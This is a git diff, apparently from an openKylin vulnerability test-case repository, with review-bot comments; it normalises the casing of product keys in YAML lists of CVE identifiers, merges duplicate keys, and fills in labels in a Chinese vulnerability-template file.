newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 34ad6d59..a6752cda 100644 
--- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -1,13 +1,13 @@ #仓库收录漏洞列表,列表中的测试用例在openKylin发行版上测试通过,用例有效。 cve: - apache: + apache-Httpd: - CVE-2020-9490 - CVE-2021-41773 - CVE-2021-42013 - apache-APISIX: + apache-Apisix: - CVE-2022-24112 - CVE-2021-45232 - apache-activemq: + apache-Activemq: - CVE-2020-13932 apache-CouchDB: - CVE-2022-24706 @@ -22,32 +22,31 @@ cve: - CVE-2021-26295 apache-Airflow: - CVE-2020-11978 - apache-log4j: + apache-Log4j: - CVE-2021-44228 - apache-solr: + apache-Solr: - CVE-2021-27905 - CVE-2019-0193 - apache-tomcat: + apache-Tomcat: - CVE-2022-29885 - CVE-2020-9484 - CVE-2020-1938 - CVE-2017-12617 + - CVE-2020-13935 apache-Spark: - CVE-2022-33891 apache-Flink: - CVE-2020-17518 - apache-tomcat: - - CVE-2020-13935 - apache-unomi: + apache-Unomi: - CVE-2020-13942 - apache-struts: + apache-Struts: - CVE-2019-0230 apache-Shiro: - CVE-2022-32532 - Influx-DB: - - CVE-2019-20933 apache-Commons: - CVE-2022-33980 + influx-DB: + - CVE-2019-20933 linux-kernel: - CVE-2021-4204 - CVE-2021-29155 @@ -170,17 +169,19 @@ cve: - CVE-2022-22965 - CVE-2022-22963 - CVE-2022-31692 + java-SE: + - CVE-2022-21449 webmin: - CVE-2019-12840 - CVE-2022-0824 - CVE-2022-36446 - CVE-2019-15107 - Zimbra: + zimbra: - CVE-2022-27925 - CVE-2022-37042 - Grafana: + grafana: - CVE-2021-43798 - Froxlor: + froxlor: - CVE-2021-42325 - CVE-2023-0315 - CVE-2023-0877 @@ -197,5 +198,4 @@ kve: - KVE-2022-0206 kylin-activation: - KVE-2022-0231 - Java-SE: - - CVE-2022-21449 + diff --git a/other_list.yaml b/other_list.yaml index bf286e5e..ea925499 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -19,11 +19,11 @@ cve: - CVE-2017-16995 polkit: - CVE-2021-3560 - Outlook: + outlook: - CVE-2023-23397 redis: - CVE-2022-0543 - EsFileExplorer: + esFileExplorer: - CVE-2019-6447 docker: - CVE-2019-5736 
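Review bot: The new key `apache-Apisix:` in the first openkylin_list.yaml hunk does not match the directory this same commit renames the APISIX files into, `cve/apache-Apsix/` (which itself drops the second "i" of APISIX), so anything that resolves list keys to directories will miss those entries; one spelling, `apache-Apisix`, should be used for both the key and the directory. The casing of the renamed keys is also mixed across this hunk and the second one — `apache-Httpd`, `apache-Activemq`, `apache-Log4j` next to the untouched `apache-CouchDB` and `apache-Airflow` — which YAML does not mind but which makes the list hard to grep. Merging the two `apache-tomcat` keys in the second hunk is a genuine fix, since a duplicate mapping key lets the later entry silently replace the earlier one in most parsers, and `CVE-2020-13935` is carried over. The last hunk appears to leave a `+` line with no content after the kve section, which only appends a blank trailing line.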
@@ -47,27 +47,25 @@ cve: - CVE-2022-34265 sudo: - CVE-2019-14287 - MinIO: + minIO: - CVE-2023-28432 - CVE-2023-28434 - WebLogic: + webLogic: - CVE-2023-21839 - Node.js: + node.js: - CVE-2021-21315 zabbix: - CVE-2022-23131 weblogic: - CVE-2022-2555 - CVE-2021-2109 - Zyxel: + zyxel: - CVE-2022-30525 - Gitlab: + gitlab: - CVE-2022-1175 -cnvd: - WordPress: + wordPress: - CVE-2019-8942 - CVE-2023-23488 - Zimbra: + zimbra: - CVE-2022-41352 cnvd: - diff --git "a/\346\274\217\346\264\236\346\250\241\347\211\210.yaml" "b/\346\274\217\346\264\236\346\250\241\347\211\210.yaml" index 1de85f71..1de22702 100644 --- "a/\346\274\217\346\264\236\346\250\241\347\211\210.yaml" +++ "b/\346\274\217\346\264\236\346\250\241\347\211\210.yaml" @@ -10,10 +10,10 @@ info: reference: - 漏洞相关链接 classification: - cvss-metrics: CVSS:3.1 + cvss-metrics: CVSS向量 cvss-score: 漏洞评分 - cve-id: - cwe-id: - cnvd-id: - kve-id: + cve-id: CVE漏洞编号 + cwe-id: CWE编号 + cnvd-id: CNVD编号 + kve-id: KVE编号 tags: 漏洞标签 \ No newline at end of file -- Gitee
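Review bot: Renaming `WebLogic:` to `webLogic:` in the second other_list.yaml hunk leaves two keys in the same `cve` mapping that differ only in case — `webLogic` (CVE-2023-21839) and the existing `weblogic` (CVE-2022-2555, CVE-2021-2109) — so the entries should be merged under one key rather than kept as near-duplicates. Dropping the stray `cnvd:` line before `wordPress:` is the right fix, as it was cutting the `cve` mapping in two and producing a second `cnvd` key later in the file. The new camel-case keys `minIO`, `webLogic` and `esFileExplorer` also follow no convention visible elsewhere in the list, where keys are either all-lowercase (`redis`, `docker`) or left as the product name.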
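Review bot: Replacing `cvss-metrics: CVSS:3.1` with `cvss-metrics: CVSS向量` in the template hunk drops the only hint of the expected value format; the filled entries in this commit use the full vector string (e.g. `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` in cve-2021-45232.yaml), so a placeholder such as `cvss-metrics: CVSS向量，如 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` would keep the template self-explanatory. The new `cve-id`/`cwe-id`/`cnvd-id`/`kve-id` labels are an improvement over the empty values, though the existing yaml files write `None` for an absent id and the template does not say which form to use when a field does not apply.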